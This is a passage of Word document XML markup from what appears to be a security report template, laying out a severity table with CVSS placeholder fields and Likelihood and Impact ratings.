          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="102FA667">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>{@cvss.cellColor}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="372BD9AA" w14:textId="31FA0769">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>cvss.baseSeverity</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2775" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CC4125"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="49BB8B8B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>{@cvss.cellColor}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="4AD62977" w14:textId="55863C6C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>cvss.baseSeverity</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CC4125"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="5D96B3A9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>{@cvss.cellColor}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="773AA650" w14:textId="5D2D2DA4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>cvss.baseSeverity</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="69F11E76">
        <w:trPr>
          <w:trHeight w:val="630"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="05CE6113" w14:textId="5585A16E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="4EFB760A" w14:textId="11083550">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2775" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="025949A2" w14:textId="31029860">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="CC4125"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="CC4125"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>cvss</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="CC4125"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>.baseSeverity}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="7BB4481A" w14:textId="2A902AED">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="CC4125"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="CC4125"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="CC4125"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>cvss</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="CC4125"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>.baseMetricScore}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="64C1D2AD">
        <w:trPr>
          <w:trHeight w:val="570"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="6C22A437" w14:textId="78FF53BA">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="312CD670" w14:textId="4F2BF75F">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2775" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="183247" w:sz="0"/>
              <w:bottom w:val="single" w:color="183247" w:sz="0"/>
              <w:right w:val="single" w:color="183247" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17D4325F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="183247" w:sz="0"/>
              <w:bottom w:val="single" w:color="183247" w:sz="0"/>
              <w:right w:val="single" w:color="183247" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3712612F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="363BD1F4">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="70BE1D02" w14:textId="62EA27F3">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
